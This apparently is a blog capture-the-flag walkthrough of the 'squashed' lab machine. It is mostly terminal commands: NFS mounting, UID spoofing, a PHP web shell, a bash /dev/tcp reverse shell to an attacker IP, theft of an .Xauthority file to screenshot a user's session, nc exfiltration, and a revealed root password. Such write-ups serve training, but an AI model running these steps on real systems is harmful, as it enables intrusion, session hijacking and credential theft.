┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.191

┌──(root㉿kali)-[/home/kali/Downloads]

└─# showmount -e 10.10.11.191

┌──(root㉿kali)-[/home/kali/Downloads]

└─# mkdir /tmp/www /tmp/home_test

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo mount -t nfs 10.10.11.191:/home/ross /tmp/home_test

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo mount -t nfs 10.10.11.191:/var/www/html /tmp/www

Once we mount them we can see some interesting files, in /home/ross we can see a Passwords.kdbx file which is a keepass database, also a .Xauthority that manage the GUI, among other stuff, we also can’t access in /var/www/html, that’s because we don’t own or belong to the group, but we can add another user to access.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cd /tmp    

┌──(rootkali)-[/tmp]

└─# ls -l

┌──(root㉿kali)-[/tmp]

└─# tree -fas ./home_test

┌──(root㉿kali)-[/tmp]

└─# tree -fas ./www

┌──(root㉿kali)-[/tmp]

└─# cd ./www

Once we add it, we can get in

┌──(root㉿kali)-[/tmp]

└─# sudo useradd sam  

┌──(root㉿kali)-[/tmp]

└─# sudo usermod -u 2017 sam

┌──(root㉿kali)-[/tmp]

└─# sudo groupmod -g 2017 sam

┌──(root㉿kali)-[/tmp]

└─# id sam

Since we can write on it, let’s send us a reverse shell

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 443

┌──(root㉿kali)-[/tmp]

└─# su sam                                                                                       

$ bash

sam@kali:/tmp$ ls –l

sam@kali:/$ echo ‘<?php system($_REQUEST[“cmd”]); ?>’ > /tmp/www/shell.php

sam@kali:/$ curl  “http://10.10.11.191/shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%22”

┌──(root㉿kali)-[/tmp/home_test]

└─# tree

┌──(root㉿kali)-[/tmp/home_test]

└─# cd Documents            

┌──(root㉿kali)-[/tmp/home_test/Documents]

└─# ls –lrt

┌──(root㉿kali)-[/tmp/home_test/Documents]

└─# cp Passwords.kdbx /home/kali/Downloads

┌──(root㉿kali)-[/tmp/home_test/Documents]

└─# cd /home/kali/Downloads

┌──(root㉿kali)-[/home/kali/Downloads]

└─# keepass2john Passwords.kdbx

However, we saw the .Xauthority file, and as we can see, ross has an active X session that we can

alex@squashed:/home/alex$ w

Well, in order to exploit the .Xauthority, we have to create a user with the specified id which is 1001.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo useradd test2

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sudo usermod -u 1001 test2

┌──(root㉿kali)-[/home/kali/Downloads]

└─# su test2

test2@kali:/home/kali/Downloads$ cd /tmp/home_test/

test2@kali:/tmp/home_test$ ls -l ./.Xauthority

Let’s mount a python server and transfer the file from the mount to the machine, so we will have the same .Xauthority as ross.

test2@kali:/tmp/home_test$ python3 -m http.server 8080

alex@squashed:/home/alex$ wget http://10.10.14.6:8080/.Xauthority

Let’s check the connection, and as we can see, Ross has the keepass open, and we could try to take a screen shot of his screen, with some luck we can get something juicy

alex@squashed:/home/alex$ env

alex@squashed:/home/alex$ export HOME=/home/alex

alex@squashed:~$ env

alex@squashed:~$ xdpyinfo -display :0

alex@squashed:~$ xwininfo -root -tree -display :0

Let’s take the screenshot, and transfer it to our machine

alex@squashed:~$ xwd -root -screen -silent -display :0 > screenshot.xwd

alex@squashed:~$ file ./screenshot.xwd

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 9001 > scrreenshot.xwd

alex@squashed:~$ nc 10.10.14.6 9001 < screenshot.xwd

┌──(root㉿kali)-[/home/kali/Downloads]

└─# convert scrreenshot.xwd screen.png

Password: cah$mei7rai9A

@SAKSHAM DIXIT

Hi, I’m saksham dixit

3 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *